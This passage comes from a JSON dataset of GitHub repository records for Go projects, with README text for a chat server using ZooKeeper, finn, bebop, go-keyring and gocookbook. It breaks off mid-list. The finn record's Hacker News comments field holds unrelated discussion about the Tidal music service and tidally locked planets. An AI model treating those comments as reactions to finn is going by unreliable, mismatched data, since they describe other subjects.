\u90e8\u7f72\u670d\u52a1\u5668\u6ce8\u610f\u9632\u706b\u5899\u662f\u5426\u5f00\u653e\u5bf9\u5e94\u7684\u7aef\u53e3(\u672c\u5730\u4e0d\u9700\u8981\uff0c\u5177\u4f53\u9700\u8981\u7684\u7aef\u53e3\u5728\u5404\u5c42\u7684\u914d\u7f6e\u6587\u4ef6)\n\n### demo\n\u804a\u5929\u5ba4\uff1ahttps://www.texixi.com:1999/\n\n\n### \u4f7f\u7528\u7684\u5305\n* log: github.com/sirupsen/logrus\n* rpc: github.com/smallnest/rpcx\n* websocket: github.com/gorilla/websocket\n* \u914d\u7f6e\u6587\u4ef6\uff1agithub.com/spf13/viper\n\n\n### zookeeper \u5b89\u88c5\n```\n wget http://mirrors.hust.edu.cn/apache/zookeeper/stable/zookeeper-3.4.12.tar.gz\n tar -zxvf zookeeper-3.4.12.tar.gz\n cd zookeeper-3.4.12/conf/\n mv zoo_sample.cfg zoo.cfg //\u66f4\u6539\u9ed8\u8ba4\u914d\u7f6e\u6587\u4ef6\u540d\u79f0\n vi zoo.cfg //\u7f16\u8f91\u914d\u7f6e\u6587\u4ef6\uff0c\u81ea\u5b9a\u4e49dataDir\n cd ../bin\n ./zkServer.sh start //\u542f\u52a8\n```\n\n### \u540e\u7eed\u8ba1\u5212\n1. \u76d1\u63a7\n2. \u804a\u5929\u673a\u5668\u4eba\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tidwall/finn", "link": "https://github.com/tidwall/finn", "tags": ["raft", "redis", "golang", "distributed-computing"], "stars": 545, "description": "Fast Raft framework using the Redis protocol for Go", "lang": "Go", "repo_lang": "", "readme": "**This project has been archived. Please check out [Uhaha](https://github.com/tidwall/uhaha) for a fitter, happier, more productive Raft framework.**\n\n

\n\"FINN\"\n

\n

\n\"Go\n\"GoDoc\"\n

\n\nFinn is a fast and simple framework for building [Raft](https://raft.github.io/) implementations in Go. It uses [Redcon](https://github.com/tidwall/redcon) for the network transport and [Hashicorp Raft](https://github.com/hashicorp/raft). There is also the option to use [LevelDB](https://github.com/syndtr/goleveldb), [BoltDB](https://github.com/boltdb/bolt) or [FastLog](https://github.com/tidwall/raft-fastlog) for log persistence.\n\n\nFeatures\n--------\n\n- Simple API for quickly creating a [fault-tolerant](https://en.wikipedia.org/wiki/Fault_tolerance) cluster\n- Fast network protocol using the [raft-redcon](https://github.com/tidwall/raft-redcon) transport\n- Optional [backends](#log-backends) for log persistence. [LevelDB](https://github.com/syndtr/goleveldb), [BoltDB](https://github.com/boltdb/bolt), or [FastLog](https://github.com/tidwall/raft-fastlog)\n- Adjustable [consistency and durability](#consistency-and-durability) levels\n- A [full-featured example](#full-featured-example) to help jumpstart integration\n- [Built-in raft commands](#built-in-raft-commands) for monitoring and managing the cluster\n- Supports the [Redis log format](http://build47.com/redis-log-format-levels/)\n- Works with clients such as [redigo](https://github.com/garyburd/redigo), [redis-py](https://github.com/andymccurdy/redis-py), [node_redis](https://github.com/NodeRedis/node_redis), [jedis](https://github.com/xetorthio/jedis), and [redis-cli](http://redis.io/topics/rediscli)\n\n\nGetting Started\n---------------\n\n### Installing\n\nTo start using Finn, install Go and run `go get`:\n\n```sh\n$ go get -u github.com/tidwall/finn\n```\n\nThis will retrieve the library.\n\n### Example\n\nHere's an example of a Redis clone that accepts the GET, SET, DEL, and KEYS commands.\n\nYou can run a [full-featured version](#full-featured-example) of this example from a terminal:\n\n```\ngo run example/clone.go\n```\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"io\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"sort\"\n\t\"strings\"\n\t\"sync\"\n\n\t\"github.com/tidwall/finn\"\n\t\"github.com/tidwall/match\"\n\t\"github.com/tidwall/redcon\"\n)\n\nfunc main() {\n\tn, err := finn.Open(\"data\", \":7481\", \"\", NewClone(), nil)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer n.Close()\n\tselect {}\n}\n\ntype Clone struct {\n\tmu sync.RWMutex\n\tkeys map[string][]byte\n}\n\nfunc NewClone() *Clone {\n\treturn &Clone{keys: make(map[string][]byte)}\n}\n\nfunc (kvm *Clone) Command(m finn.Applier, conn redcon.Conn, cmd redcon.Command) (interface{}, error) {\n\tswitch strings.ToLower(string(cmd.Args[0])) {\n\tdefault:\n\t\treturn nil, finn.ErrUnknownCommand\n\tcase \"set\":\n\t\tif len(cmd.Args) != 3 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\treturn m.Apply(conn, cmd,\n\t\t\tfunc() (interface{}, error) {\n\t\t\t\tkvm.mu.Lock()\n\t\t\t\tkvm.keys[string(cmd.Args[1])] = cmd.Args[2]\n\t\t\t\tkvm.mu.Unlock()\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t\tfunc(v interface{}) (interface{}, error) {\n\t\t\t\tconn.WriteString(\"OK\")\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\tcase \"get\":\n\t\tif len(cmd.Args) != 2 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\treturn m.Apply(conn, cmd, nil,\n\t\t\tfunc(interface{}) (interface{}, error) {\n\t\t\t\tkvm.mu.RLock()\n\t\t\t\tval, ok := kvm.keys[string(cmd.Args[1])]\n\t\t\t\tkvm.mu.RUnlock()\n\t\t\t\tif !ok {\n\t\t\t\t\tconn.WriteNull()\n\t\t\t\t} else {\n\t\t\t\t\tconn.WriteBulk(val)\n\t\t\t\t}\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\tcase \"del\":\n\t\tif len(cmd.Args) < 2 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\treturn m.Apply(conn, cmd,\n\t\t\tfunc() (interface{}, error) {\n\t\t\t\tvar n int\n\t\t\t\tkvm.mu.Lock()\n\t\t\t\tfor i := 1; i < len(cmd.Args); i++ {\n\t\t\t\t\tkey := string(cmd.Args[i])\n\t\t\t\t\tif _, ok := kvm.keys[key]; ok {\n\t\t\t\t\t\tdelete(kvm.keys, key)\n\t\t\t\t\t\tn++\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tkvm.mu.Unlock()\n\t\t\t\treturn n, nil\n\t\t\t},\n\t\t\tfunc(v interface{}) (interface{}, error) {\n\t\t\t\tn := v.(int)\n\t\t\t\tconn.WriteInt(n)\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\tcase \"keys\":\n\t\tif len(cmd.Args) != 2 {\n\t\t\treturn nil, finn.ErrWrongNumberOfArguments\n\t\t}\n\t\tpattern := string(cmd.Args[1])\n\t\treturn m.Apply(conn, cmd, nil,\n\t\t\tfunc(v interface{}) (interface{}, error) {\n\t\t\t\tvar keys []string\n\t\t\t\tkvm.mu.RLock()\n\t\t\t\tfor key := range kvm.keys {\n\t\t\t\t\tif match.Match(key, pattern) {\n\t\t\t\t\t\tkeys = append(keys, key)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tkvm.mu.RUnlock()\n\t\t\t\tsort.Strings(keys)\n\t\t\t\tconn.WriteArray(len(keys))\n\t\t\t\tfor _, key := range keys {\n\t\t\t\t\tconn.WriteBulkString(key)\n\t\t\t\t}\n\t\t\t\treturn nil, nil\n\t\t\t},\n\t\t)\n\t}\n}\n\nfunc (kvm *Clone) Restore(rd io.Reader) error {\n\tkvm.mu.Lock()\n\tdefer kvm.mu.Unlock()\n\tdata, err := ioutil.ReadAll(rd)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar keys map[string][]byte\n\tif err := json.Unmarshal(data, &keys); err != nil {\n\t\treturn err\n\t}\n\tkvm.keys = keys\n\treturn nil\n}\n\nfunc (kvm *Clone) Snapshot(wr io.Writer) error {\n\tkvm.mu.RLock()\n\tdefer kvm.mu.RUnlock()\n\tdata, err := json.Marshal(kvm.keys)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif _, err := wr.Write(data); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}\n```\n\nThe Applier Type\n----------------\nEvery `Command()` call provides an `Applier` type which is responsible for handling all Read or Write operation. In the above example you will see one `m.Apply(conn, cmd, ...)` for each command.\n\nThe signature for the `Apply()` function is:\n```go\nfunc Apply(\n\tconn redcon.Conn, \n\tcmd redcon.Command,\n\tmutate func() (interface{}, error),\n\trespond func(interface{}) (interface{}, error),\n) (interface{}, error)\n```\n\n- `conn` is the client connection making the call. It's possible that this value may be `nil` for commands that are being replicated on Follower nodes. \n- `cmd` is the command to process.\n- `mutate` is the function that handles modifying the node's data. \nPassing `nil` indicates that the operation is read-only.\nThe `interface{}` return value will be passed to the `respond` func.\nReturning an error will cancel the operation and the error will be returned to the client.\n- `respond` is used for responding to the client connection. It's also used for read-only operations. The `interface{}` param is what was passed from the `mutate` function and may be `nil`. \nReturning an error will cancel the operation and the error will be returned to the client.\n\n*Please note that the `Apply()` command is required for modifying or accessing data that is shared on all of the nodes.\nOptionally you can forgo the call altogether for operations that are unique to the node.*\n\nSnapshots\n---------\nAll Raft commands are stored in one big log file that will continue to grow. The log is stored on disk, in memory, or both. At some point the server will run out of memory or disk space.\nSnapshots allows for truncating the log so that it does not take up all of the server's resources.\n\nThe two functions `Snapshot` and `Restore` are used to create a snapshot and restore a snapshot, respectively.\n\nThe `Snapshot()` function passes a writer that you can write your snapshot to.\nReturn `nil` to indicate that you are done writing. Returning an error will cancel the snapshot. If you want to disable snapshots altogether:\n\n```go\nfunc (kvm *Clone) Snapshot(wr io.Writer) error {\n\treturn finn.ErrDisabled\n}\n```\n\nThe `Restore()` function passes a reader that you can use to restore your snapshot from.\n\n*Please note that the Raft cluster is active during a snapshot operation. \nIn the example above we use a read-lock that will force the cluster to delay all writes until the snapshot is complete.\nThis may not be ideal for your scenario.*\n\nFull-featured Example\n---------------------\n\nThere's a command line Redis clone that supports all of Finn's features. Print the help options:\n\n```\ngo run example/clone.go -h\n```\n\nFirst start a single-member cluster:\n```\ngo run example/clone.go\n```\n\nThis will start the clone listening on port 7481 for client and server-to-server communication.\n\nNext, let's set a single key, and then retrieve it:\n\n```\n$ redis-cli -p 7481 SET mykey \"my value\"\nOK\n$ redis-cli -p 7481 GET mykey\n\"my value\"\n```\n\nAdding members:\n```\ngo run example/clone.go -p 7482 -dir data2 -join :7481\ngo run example/clone.go -p 7483 -dir data3 -join :7481\n```\n\nThat's it. Now if node1 goes down, node2 and node3 will continue to operate.\n\n\nBuilt-in Raft Commands\n----------------------\nHere are a few commands for monitoring and managing the cluster:\n\n- **RAFTADDPEER addr** \nAdds a new member to the Raft cluster\n- **RAFTREMOVEPEER addr** \nRemoves an existing member\n- **RAFTPEERS addr** \nLists known peers and their status\n- **RAFTLEADER** \nReturns the Raft leader, if known\n- **RAFTSNAPSHOT** \nTriggers a snapshot operation\n- **RAFTSTATE** \nReturns the state of the node\n- **RAFTSTATS** \nReturns information and statistics for the node and cluster\n\nConsistency and Durability\n--------------------------\n\n### Write Durability\n\nThe `Options.Durability` field has the following options:\n\n- `Low` - fsync is managed by the operating system, less safe\n- `Medium` - fsync every second, fast and safer\n- `High` - fsync after every write, very durable, slower\n\n### Read Consistency\n\nThe `Options.Consistency` field has the following options:\n\n- `Low` - all nodes accept reads, small risk of [stale](http://stackoverflow.com/questions/1563319/what-is-stale-state) data\n- `Medium` - only the leader accepts reads, itty-bitty risk of stale data during a leadership change\n- `High` - only the leader accepts reads, the raft log index is incremented to guaranteeing no stale data\n\nFor example, setting the following options:\n\n```go\nopts := finn.Options{\n\tConsistency: High,\n\tDurability: High,\n}\nn, err := finn.Open(\"data\", \":7481\", \"\", &opts)\n```\n\nProvides the highest level of durability and consistency.\n\nLog Backends\n------------\nFinn supports the following log databases.\n\n- [FastLog](https://github.com/tidwall/raft-fastlog) - log is stored in memory and persists to disk, very fast reads and writes, log is limited to the amount of server memory.\n- [LevelDB](https://github.com/syndtr/goleveldb) - log is stored only to disk, supports large logs.\n- [Bolt](https://github.com/boltdb/bolt) - log is stored only to disk, supports large logs.\n\nContact\n-------\nJosh Baker [@tidwall](http://twitter.com/tidwall)\n\nLicense\n-------\nFinn source code is available under the MIT [License](/LICENSE).\n", "readme_type": "markdown", "hn_comments": "It's a bit challenging to find more details on Tidal's site. Their homepage is a livestream of an event, and there is no context on the page as to what the event is. Possibly their launch event?Watching the product video on the 'Explore Tidal' page makes me think of Spotify. They look to have complete feature parity with the only additional selling point being a higher quality audio stream. My initial reaction is, well...that is great if I had nice speakers, but my apple headphones certainly can't tell the difference.It's good to see other people competing with Spotify and I'm hopeful that Tidal can have better content curation than Spotify.I was at an astrobiology conference this week, and one of the ideas that we discussed is that life on Earth is good at finding and exploiting gradients for energy harvesting---thermal, chemical, even electrical. I'm not sure how to weight the whole \"the atmosphere will freeze out\" argument, but it does seem like having a constant, predictable thermal gradient, coupled with lower average high energy radiation (not much UV at sunset), should be conducive to life, all else being equal.I don't know enough about tides and atmospheres to say whether or not this sort of arrangement would be more conducive towards generating life.However, there's plenty of evidence that our rotating Earth gives a lot of benefits. There's the jet stream, which helps to spread moisture, there's the tides themselves, which helped create thriving transition zones between aquatic and terrestrial life (tide pools, etc.)I'm also thinking of Jared Diamond's Guns Germs and Steel. In our own case of planet Earth, we had pretty big geographic obstacles that both enabled and prevented the spread of certain forms of life (Deer can easily migrate within the larger temperate zones, enabling their species to spread easily. Viruses can't easily cross oceans, making it unlikely that they wipe out an entire species.)Tidal locking isn't always 1:1. Mercury, the lone tidally locked planet in our Solar System, is locked at a 3:2 resonance. For simple thermodynamic reasons one would expect that in most cases the planets locked at an \"offset\" ratio are far more likely to be habitable than the ones locked at 1:1. This happens when there are outlying large planets that disrupt the orbit:http://en.wikipedia.org/wiki/Mercury_%28planet%29#Spin.E2.80...I wonder if the earth would be tidally locked without having bumped into the moon at some point.Aside from the obvious problems with keeping an atmosphere, can tidally locked planets have a magnetosphere?\"Tidally locked\"There, was that so hard? Extraordinary effort here to coin a neologism for something that's already an established phrase.This is also a blogpost promoting a paper about cloud formation in tidally locked planets, which it appears someone forgot to link, inside the phrase \"Gory details here\".Someone already calculated in 1950 that such planet is very unlikely to have an atmosphere. Temperature difference is about 300 degrees celsius and most gasses would either froze on cold side, or escape to space on warm side.In best cases you get permanent hurricane (Venus)A couple problems - when there's even a tiny wobble the goldilocks zone will alternate from extreme freezing to extreme heat. The other problem is that the atmosphere will eventually fully condense on the cold side of the planet.I imagine Game of Thrones is set on such a planet :)The whole time I was reading this was \"selection bias\".> The easiest planets to find are those that orbit close to their stars.> Tides drive the planet\u2019s obliquity to zero, meaning that the planet\u2019s equator is perfectly aligned with its orbit. The planet will also be \u201ctidally locked\u201dSeems likely that the first planets we'll find life on are the planets that are easy to find.I'm surprised that tidal locking happen for a planet with liquids on the surface, except in a jury-rigged toy scenario. I'd expect that the energy would cause fluid/molden volumes to circulate. This would create motion relative to the energy source.It might be possible to use this same kind of circulation effect to have a self-contained space-craft. It would consume solar energy, and then strategically pump volumes of fluid from one end to the other, to deliberately change its momentum.http://www.wired.com/thisdayintech/2010/05/0526bill-gates-in...Pretty interesting how accurate his predictions were, in everything from internet domination, the death of services like AOL, free ad-funded content, P2P, and search.Possibly more interesting that Microsoft failed to really capitalize on almost all of them.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "disintegration/bebop", "link": "https://github.com/disintegration/bebop", "tags": ["forum", "discussion-board", "web-app", "rest-api", "vuejs", "golang"], "stars": 545, "description": "Bebop is a simple discussion board / forum web application", "lang": "Go", "repo_lang": "", "readme": "# Bebop\n\nBebop is a simple discussion board / forum web application.\n\n## Features\n\n- REST API backend written in Go\n- Vue.js-based frontend\n- Two databases are supported: \n - PostgreSQL\n - MySQL\n- Three file-storage backends are supported to store user-uploaded files (e.g. avatars):\n - Local filesystem\n - Google Cloud Storage\n - Amazon S3\n- Social login (OAuth 2.0) via three providers:\n - Google\n - Facebook\n - Github\n- JSON Web Tokens (JWT) are used for user authentication in the API\n- Single binary deploy. All the static assets (frontend JavaScript & CSS files) are embedded into the binary\n- Markdown comments\n- Avatar upload, including animated GIFs. Auto-generated letter-avatars on user creation\n\n## Getting Started\n\n * Create a new empty database (MySQL \u043er PostgreSQL) that will be used as a data store and a database user with all privileges granted on this database.\n\n * Obtain OAuth 2.0 credentials (client_id and secret) from at least one of the providers (Google, Facebook, Github) so users can log into the web application. The OAuth callback url will be `/oauth/end/`. The `` is where the bebop web app will be mounted on your site and the `` is the lowercase provider name. For example, if base_url is `https://my.website.com/forum/`, then the oauth callback url for google will be `https://my.website.com/forum/oauth/end/google`.\n\n * Download and compile the bebop binary:\n ```\n $ go get -u github.com/disintegration/bebop/cmd/bebop\n ```\n\n * Inside an empty directory run:\n ```\n $ bebop init\n ```\n This will generate an initial configuration file \"bebop.conf\" inside the current dir.\n Edit the configuration file to set the server listen address, the base url, the database and file storage parameters, OAuth credentials, etc.\n\n * Run the following command to start the bebop web server.\n ```\n $ bebop start\n ```\n\n * Sign in into your web application using one of the social login providers.\n Then run the following command to grant admin privileges to your user.\n ```\n $ bebop add-admin \n ```\n\n## Screenshots\n\n### Topics\n\n![Topics](screenshot-topics.png)\n\n### Comments\n\n![Comments](screenshot-comments.png)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zalando/go-keyring", "link": "https://github.com/zalando/go-keyring", "tags": ["golang", "dbus", "secret", "keyring", "utilities", "authentication"], "stars": 544, "description": "Cross-platform keyring interface for Go", "lang": "Go", "repo_lang": "", "readme": "# Go Keyring library\n[![Build Status](https://travis-ci.org/zalando/go-keyring.svg?branch=master)](https://travis-ci.org/zalando/go-keyring)\n[![Build status](https://ci.appveyor.com/api/projects/status/l8hdbqng769sc2c5/branch/master?svg=true)](https://ci.appveyor.com/project/mikkeloscar/go-keyring/branch/master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/zalando/go-keyring)](https://goreportcard.com/report/github.com/zalando/go-keyring)\n[![GoDoc](https://godoc.org/github.com/zalando/go-keyring?status.svg)](https://godoc.org/github.com/zalando/go-keyring)\n\n`go-keyring` is an OS-agnostic library for *setting*, *getting* and *deleting*\nsecrets from the system keyring. It supports **OS X**, **Linux/BSD (dbus)** and\n**Windows**.\n\ngo-keyring was created after its authors searched for, but couldn't find, a better alternative. It aims to simplify\nusing statically linked binaries, which is cumbersome when relying on C bindings (as other keyring libraries do).\n\n#### Potential Uses\n\nIf you're working with an application that needs to store user credentials\nlocally on the user's machine, go-keyring might come in handy. For instance, if you are writing a CLI for an API\nthat requires a username and password, you can store this information in the\nkeyring instead of having the user type it on every invocation.\n\n## Dependencies\n\n#### OS X\n\nThe OS X implementation depends on the `/usr/bin/security` binary for\ninterfacing with the OS X keychain. It should be available by default.\n\n#### Linux and *BSD\n\nThe Linux and *BSD implementation depends on the [Secret Service][SecretService] dbus\ninterface, which is provided by [GNOME Keyring](https://wiki.gnome.org/Projects/GnomeKeyring).\n\nIt's expected that the default collection `login` exists in the keyring, because\nit's the default in most distros. If it doesn't exist, you can create it through the\nkeyring frontend program [Seahorse](https://wiki.gnome.org/Apps/Seahorse):\n\n * Open `seahorse`\n * Go to **File > New > Password Keyring**\n * Click **Continue**\n * When asked for a name, use: **login**\n\n## Example Usage\n\nHow to *set* and *get* a secret from the keyring:\n\n```go\npackage main\n\nimport (\n \"log\"\n\n \"github.com/zalando/go-keyring\"\n)\n\nfunc main() {\n service := \"my-app\"\n user := \"anon\"\n password := \"secret\"\n\n // set password\n err := keyring.Set(service, user, password)\n if err != nil {\n log.Fatal(err)\n }\n\n // get password\n secret, err := keyring.Get(service, user)\n if err != nil {\n log.Fatal(err)\n }\n\n log.Println(secret)\n}\n\n```\n\n## Tests\n### Running tests\nRunning the tests is simple:\n\n```\ngo test\n```\n\nWhich OS you use *does* matter. If you're using **Linux** or **BSD**, it will\ntest the implementation in `keyring_unix.go`. If running the tests\non **OS X**, it will test the implementation in `keyring_darwin.go`.\n\n### Mocking\nIf you need to mock the keyring behavior for testing on systems without a keyring implementation you can call `MockInit()` which will replace the OS defined provider with an in-memory one.\n\n```go\npackage implementation\n\nimport (\n \"testing\"\n\n \"github.com/zalando/go-keyring\"\n)\n\nfunc TestMockedSetGet(t *testing.T) {\n keyring.MockInit()\n err := keyring.Set(\"service\", \"user\", \"password\")\n if err != nil {\n t.Fatal(err)\n }\n\n p, err := keyring.Get(\"service\", \"user\")\n if err != nil {\n t.Fatal(err)\n }\n\n if p != \"password\" {\n t.Error(\"password was not the expected string\")\n }\n\n}\n\n```\n\n## Contributing/TODO\n\nWe welcome contributions from the community; please use [CONTRIBUTING.md](CONTRIBUTING.md) as your guidelines for getting started. Here are some items that we'd love help with:\n\n- The code base\n- Better test coverage\n\nPlease use GitHub issues as the starting point for contributions, new ideas and/or bug reports.\n\n## Contact\n\n* E-Mail: team-teapot@zalando.de\n* Security issues: Please send an email to the [maintainers](MAINTAINERS), and we'll try to get back to you within two workdays. If you don't hear back, send an email to team-teapot@zalando.de and someone will respond within five days max.\n\n## Contributors\n\nThanks to:\n\n- [your name here]\n\n## License\n\nSee [LICENSE](LICENSE) file.\n\n\n[SecretService]: https://specifications.freedesktop.org/secret-service/latest/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kevinyan815/gocookbook", "link": "https://github.com/kevinyan815/gocookbook", "tags": [], "stars": 544, "description": "go cook book", "lang": "Go", "repo_lang": "", "readme": "# Golang Development Notes\n\n\nUse the Go language for development, sort out some common cases in this Repository, and plan to slowly accumulate it as a CookBook for future development.\n\nThe code samples corresponding to all knowledge points in the warehouse can run normally, and there will be no problem in directly applying them to production projects. Because the purpose is to accumulate the desk books of Go language development, so I don\u2019t talk about source code analysis and the like. If you want to know more about the various internal principles of Go language and source code interpretation, please follow my official account **\"Network Management \u53e3bi Nao\"**, in addition to the application, a lot of principle analysis will be used there.\n\n![#\u516c\u5171\u53f7\uff1a\u7f51\u7edc\u5411bi\u5411](https://cdn.learnku.com/uploads/images/202109/24/6964/ZXgD1fAlOU.png!large)\n\n\n## Table of contents\n- Early preparation\n - [Environment installation](https://github.com/kevinyan815/gocookbook/issues/74)\n - [Basic Grammar](https://github.com/kevinyan815/gocookbook/blob/master/lang-basic/README.md)\n- initialization\n - [Execution sequence of Go application initialization work](https://github.com/kevinyan815/gocookbook/issues/24)\n - [Six features of Go language init function](https://mp.weixin.qq.com/s/P-BhuQy1Vd3lxlYgClDAJA)\n\n- Project\n - [Dependency management tool GOMODULE](https://mp.weixin.qq.com/s/xtvTUl2IZFQ79dSR_m-b7A)\n - [GoModules manages private dependent modules](https://mp.weixin.qq.com/s/8E1PwnglrS18hZsUEvE-Qw)\n - [Version management of Go Modules dependencies](https://mp.weixin.qq.com/s/ptJK7CDHCr6P4JCdsUXKdg)\n - [Common Coding Specifications](https://github.com/kevinyan815/gocookbook/issues/61)\n - [How to implement enumeration in Go](https://github.com/kevinyan815/gocookbook/issues/73)\n- string\n - [See through Go language strings](https://github.com/kevinyan815/gocookbook/issues/40)\n - [Operating Chinese strings](https://github.com/kevinyan815/gocookbook/issues/11)\n - [Common string operations](https://yourbasic.org/golang/string-functions-reference-cheat-sheet/)\n - [Mutual conversion between string, int, int64 types](https://yourbasic.org/golang/convert-int-to-string/)\n - [High performance string concatenation](https://github.com/kevinyan815/gocookbook/issues/68)\n- array\n - [Array upper limit derivation and out-of-bounds check](https://github.com/kevinyan815/gocookbook/issues/37)\n- Slice\n - [declaration and initialization](https://github.com/kevinyan815/gocookbook/issues/3)\n - [Append and remove elements](https://github.com/kevinyan815/gocookbook/issues/4)\n - [Filter duplicate elements](https://github.com/kevinyan815/gocookbook/issues/5)\n - [Sorting structure slices](https://github.com/kevinyan815/gocookbook/issues/12)\n - [Slices are not reference types](https://github.com/kevinyan815/gocookbook/issues/38)\n - [A few pitfalls to pay attention to when using slices](https://mp.weixin.qq.com/s/ISLNTCo7Jr9XnqAEhDuYcw)\n-Map\n - [(General Concept) Hash Table Design Principle](https://github.com/kevinyan815/gocookbook/issues/39)\n - [declaration and initialization](https://github.com/kevinyan815/gocookbook/issues/6)\n - [Do not write key values \u200b\u200bto nil map](https://github.com/kevinyan815/gocookbook/issues/7)\n - [Modify map](https://github.com/kevinyan815/gocookbook/issues/8)\n - [traverse map](https://github.com/kevinyan815/gocookbook/issues/15)\n - [make and new](https://github.com/kevinyan815/gocookbook/issues/53)\n - [Will the Map parameter of the Go function point to different underlying memory after expansion?](https://mp.weixin.qq.com/s/WfzeNWV1j0fSXUiVOLe5jw)\n- read and write data\n - [Encoding JSON](https://github.com/kevinyan815/gocookbook/issues/2)\n - [Decoding JSON](https://github.com/kevinyan815/gocookbook/issues/1)\n - [Read file line by line](https://github.com/kevinyan815/gocookbook/issues/13)\n - [Summary of how to use the Go language IO library (which library should be used for IO operations)](https://github.com/kevinyan815/gocookbook/issues/62)\n - [Byte order: big endian and little endian](https://mp.weixin.qq.com/s/ri2tt4nvEJub-wEsh0WPPA)\n - [Use Golang to read and write HTTP requests (with Options design pattern implementation)](https://github.com/kevinyan815/gocookbook/issues/64)\n- Directory and file operations\n - [Go Language File Operation Encyclopedia](https://mp.weixin.qq.com/s/dQUEq0lJekEUH4CHEMwANw)\n - [Add meal version--practical directory and file operations](https://github.com/kevinyan815/gocookbook/issues/84)\n \n- pointer\n - [Usage and usage restrictions](https://github.com/kevinyan815/gocookbook/issues/41)\n - [uintptr and unsafer.Pointer](https://github.com/kevinyan815/gocookbook/issues/42)\n - [Extended reading: memory alignment](https://github.com/kevinyan815/gocookbook/issues/43)\n- interface\n - [Know the interface of Go](https://github.com/kevinyan815/gocookbook/issues/45)\n - [Types and method receivers of Go interfaces](https://github.com/kevinyan815/gocookbook/issues/46)\n - [Type conversion and assertion of interface](https://github.com/kevinyan815/gocookbook/issues/47)\n - [Dynamic dispatch when interface is called](https://github.com/kevinyan815/gocookbook/issues/67)\n- [Range iteration](https://github.com/kevinyan815/gocookbook/issues/15)\n- function\n - [Calling conventions and parameter passing](https://github.com/kevinyan815/gocookbook/issues/44)\n - [Usage and behavior analysis of defer](https://github.com/kevinyan815/gocookbook/issues/51)\n - [panic and recover](https://github.com/kevinyan815/gocookbook/issues/52)\n\n- error handling\n - [Some suggestions on error handling in Golang](https://github.com/kevinyan815/gocookbook/issues/66)\n - [Go code more elegant error handling](https://github.com/kevinyan815/gocookbook/issues/82)\n - [Packaging errors and related interfaces after Go 1.13](https://mp.weixin.qq.com/s/SFbSAGwQgQBVWpySYF-rkw)\n- Bag\n - [Internal package](https://github.com/kevinyan815/gocookbook/issues/58)\n- standard library\n - [Regular tableDa formula](https://github.com/kevinyan815/gocookbook/issues/9)\n - [Time common basic operations](https://github.com/kevinyan815/gocookbook/issues/14)\n - [Time zone and time calculation operation summary of Time](https://github.com/kevinyan815/gocookbook/issues/85)\n- database access\n - [Use the standard library database/sql to access the database](https://mp.weixin.qq.com/s/bhsFCXTZ_TBP0EvyRM-bdA)\n - [Use the ORM library gorm to access the database](https://mp.weixin.qq.com/s/N-ZAgRrEu2FJBlApIhuVsg)\n - [GORM Guide](https://gorm.io/zh_CN/docs/index.html)\n- System programming\n - [command line flag](https://github.com/kevinyan815/gocookbook/issues/36)\n - [Monitoring system signal](https://github.com/kevinyan815/gocookbook/issues/55)\n- Concurrent programming\n - [Context](https://github.com/kevinyan815/gocookbook/issues/50)\n - [Context usage example](https://github.com/kevinyan815/gocookbook/issues/50)\n - [Illustrated Context Principle](https://mp.weixin.qq.com/s/NNYyBLOO949ElFriLVRWiA)\n - [Context source code learning](https://mp.weixin.qq.com/s/SJna8UAoV9GTGCuRezC9Qw)\n - [Channel basic concepts and usage](https://github.com/kevinyan815/gocookbook/issues/54)\n - [Coordinated waiting with WaitGroup](https://github.com/kevinyan815/gocookbook/issues/34)\n - [ErrorGroup takes into account cooperative waiting and error delivery](https://github.com/kevinyan815/gocookbook/issues/35)\n - [Correct posture for Reset timer](https://github.com/kevinyan815/gocookbook/issues/17)\n - [An example combining cancelCtx, Timer, Goroutine, Channel](https://github.com/kevinyan815/gocookbook/issues/18)\n - [Using WaitGroup, Channel and Context to create a concurrent user tag queryer](https://github.com/kevinyan815/gocookbook/issues/21)\n - [Implement a limited-capacity queue using sync.Cond](https://github.com/kevinyan815/gocookbook/issues/22)\n - [Using semaphores to control concurrent access to limited resources](https://github.com/kevinyan815/gocookbook/issues/30)\n - [Using Chan to extend the functionality of mutexes](https://github.com/kevinyan815/gocookbook/issues/25)\n - [merge duplicate requests with SingleFlight](https://github.com/kevinyan815/gocookbook/issues/31)\n - [CyclicBarrier Cyclic Barrier](https://github.com/kevinyan815/gocookbook/issues/32)\n - [Detailed usage of atomic operations](https://github.com/kevinyan815/gocookbook/issues/65)\n- reflection\n - [Go reflection tutorial](https://github.com/kevinyan815/gocookbook/issues/69)\n - [The most common application of reflection -- structure tag] (https://github.com/kevinyan815/gocookbook/issues/70)\n- Record of Online Problem Solving\n - [Redirect runtime panic to log file](https://github.com/kevinyan815/gocookbook/issues/19)\n - [Use Go's cross-compilation and conditional compilation to make your own software package run on multiple platforms](https://github.com/kevinyan815/gocookbook/issues/20)\n - [How to set GOMAXPRCS in the container](https://github.com/kevinyan815/gocookbook/issues/57)\n - [Several methods to prevent concurrency from destroying friendly forces](https://github.com/kevinyan815/gocookbook/issues/63)\n- Compilation principle\n - [Compilation principle of Go program](https://github.com/kevinyan815/gocookbook/issues/56)\n- Some interesting little programs\n - [A simple probability draw 